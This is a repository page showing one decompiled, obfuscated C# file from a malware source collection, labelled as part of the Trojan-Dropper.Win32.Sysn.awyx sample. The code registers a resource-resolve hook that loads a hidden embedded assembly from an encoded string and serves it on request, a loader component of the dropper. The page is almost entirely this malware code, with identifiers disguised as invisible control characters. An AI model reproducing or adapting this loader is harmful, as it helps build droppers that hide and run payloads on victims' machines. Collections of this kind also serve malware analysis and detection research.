MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0006.cs
2022-08-18 06:28:56 -05:00

51 lines
1.4 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal sealed class \u0006
{
private static Assembly \u0001 = (Assembly) null;
private static string[] \u0001 = new string[0];
internal static void \u000F()
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0006.\u000F);
}
catch (Exception ex)
{
}
}
internal static Assembly \u000F([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0006.\u0001 == null)
{
lock (\u0006.\u0001)
{
\u0006.\u0001 = Assembly.Load(\u0004.\u000F(192));
if ((object) \u0006.\u0001 != null)
\u0006.\u0001 = \u0006.\u0001.GetManifestResourceNames();
}
}
string name = obj1.Name;
for (int index = 0; index < \u0006.\u0001.Length; ++index)
{
if (\u0006.\u0001[index] == name)
return \u0006.\u0001;
}
return (Assembly) null;
}
}
}